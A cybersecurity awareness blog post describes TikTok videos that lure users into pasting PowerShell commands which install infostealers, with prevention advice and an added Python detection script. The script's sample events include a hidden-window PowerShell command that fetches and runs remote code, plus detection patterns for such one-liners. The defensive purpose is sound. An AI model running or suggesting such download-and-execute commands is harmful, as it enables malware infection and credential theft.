Malware on TikTok: Danger in videos
- Cyberpeace Tech

- 3 days ago
In recent months, videos have been detected on TikTok that, under the guise of useful tutorials and guides (for example, supposed instructions for activating popular software), induce users to download and run malware.
These clips invite users to copy and paste commands into Windows (often a PowerShell script) that end up installing programs designed to steal sensitive data from computers and online accounts.

What exactly do these videos do?
The content appears to be tricks, activators, or quick fixes for programs such as Adobe Premiere, Microsoft 365, or even non-existent packages that promise extra features in streaming services. In reality, the goal is to convince the user to execute a command in the Run window or terminal. That command downloads and installs an infostealer that:
Extracts passwords saved in browsers.
Steals session cookies and authentication tokens.
Accesses cryptocurrency wallets and credentials from other applications.
A specific example of this malicious chain is the use of an installer referred to as ClickFix, which prompts users to execute a malicious command in PowerShell and deploys a stealer known as Aura Stealer. In addition to Aura, ClickFix can download additional software whose actual purpose is not always clear.
It's not new, it's an evolved technique
Deception is not new: since the 2000s, pop-ups and fake virus warnings have been used to scam users. The difference now is the channel and the disguise. Instead of pop-ups, attackers use social platforms and short videos (a format that quickly builds trust) and take advantage of the habit of following step-by-step instructions without verifying their origin.
Why is it so dangerous?
Videos are persuasive and reach mass audiences.
Copying and pasting commands is a low-friction action for many users.
Malware steals credentials that enable impersonation, access to bank accounts or cryptocurrency wallets, and the exfiltration of confidential files.
Some malware installs additional payloads for unknown purposes, increasing the risk.
What can Mexico learn from this?
Although the cases are detected on global platforms, the risk applies equally in Mexico.
Practical lessons for the country include:
Intensify awareness campaigns about the risks of executing commands and downloading software from non-official sources.
Include modules on social media scams in digital education programs in schools and businesses.
Promote policies in companies to disable the execution of unsigned scripts and reinforce PowerShell control at endpoints.
Encourage the adoption of endpoint protection and behavioral analysis solutions that detect infostealers.
Practical recommendations (for users and businesses)
Never run commands or scripts copied from social media without verifying the source.
Only download software from official websites or authorized stores.
Enable multi-factor authentication for bank accounts, email, and cloud services.
Keep browsers and systems up to date; use password managers instead of saving passwords in the browser.
For companies: apply PowerShell blocking policies for end users, network segmentation, and behavior monitoring.
Report suspicious videos to the platform and, if there are signs of compromise, change passwords from a clean device and inform the IT department.
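The behavior monitoring recommended above can start from process-creation logs. The following Python example is added here and is not part of the original article: it scores PowerShell command lines for indicators associated with copy-and-paste lures. The event fields, indicator patterns, threshold, and sample events are assumptions constructed for illustration.

```python
import re

# Assumed indicator set for paste-and-run PowerShell one-liners (not from the article).
DOWNLOAD = re.compile(r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget|"
                      r"downloadstring|downloadfile)\b", re.I)
EXECUTE = re.compile(r"\b(invoke-expression|iex)\b", re.I)
ENCODED = re.compile(r"(?<![\w-])-e[a-z]*\s+[A-Za-z0-9+/=]{20,}", re.I)
HIDDEN = re.compile(r"(?<![\w-])-w[a-z]*\s+(hidden|1)\b", re.I)

def score_event(event):
    """Return (score, reasons) for one process-creation event (hypothetical schema)."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    if image not in ("powershell.exe", "pwsh.exe"):
        return 0, []
    cmd = event["command_line"]
    reasons = []
    if DOWNLOAD.search(cmd) and EXECUTE.search(cmd):
        reasons.append("download combined with Invoke-Expression")
    if ENCODED.search(cmd):
        reasons.append("encoded command")
    if HIDDEN.search(cmd):
        reasons.append("hidden window")
    # The Run dialog (Win+R) starts processes as children of explorer.exe.
    if reasons and event["parent_image"].lower().endswith("\\explorer.exe"):
        reasons.append("launched from explorer.exe")
    return len(reasons), reasons

def triage(events, threshold=2):
    """Return (host, score, reasons) for events at or above the threshold."""
    scored = [(e["host"],) + score_event(e) for e in events]
    return [s for s in scored if s[1] >= threshold]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
# Constructed sample events; the URL and the base64 value are harmless placeholders.
SAMPLE_EVENTS = [
    {"host": "WS-01", "parent_image": EXPLORER, "image": PS,
     "command_line": 'powershell -w hidden -c "iex (irm https://example.invalid/fix)"'},
    {"host": "WS-02", "parent_image": r"C:\Windows\System32\svchost.exe", "image": PS,
     "command_line": r"powershell.exe -NoProfile -ExecutionPolicy AllSigned -File C:\Scripts\inventory.ps1"},
    {"host": "WS-03", "parent_image": EXPLORER, "image": PS,
     "command_line": "powershell.exe -enc VwByAGkAdABlAC0ASABvAHMAdAAgACcAdABlAHMAdAAnAA=="},
    {"host": "WS-04", "parent_image": EXPLORER, "image": PS, "command_line": "powershell.exe"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Execution policy governs script files, not commands typed or pasted interactively or passed with -Command, so this kind of logging-based detection complements a signed-script policy rather than duplicating it.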
Conclusion
The short video format and the apparent simplicity of the instructions make platforms such as TikTok an effective vehicle for social engineering that leads to malware infections. The best defense is prevention: education, technical policies, and protective measures that reduce the likelihood that a copied command will result in the installation of an information stealer.
At Cyberpeace, we encourage you to stay alert and informed about new cyberattack tactics, such as malware on social media. Digital education and prevention are the most effective tools for protecting your information and keeping your devices secure. Want to learn more about cybersecurity and best practices online? Follow our social media accounts and visit our blog to stay one step ahead of digital threats.








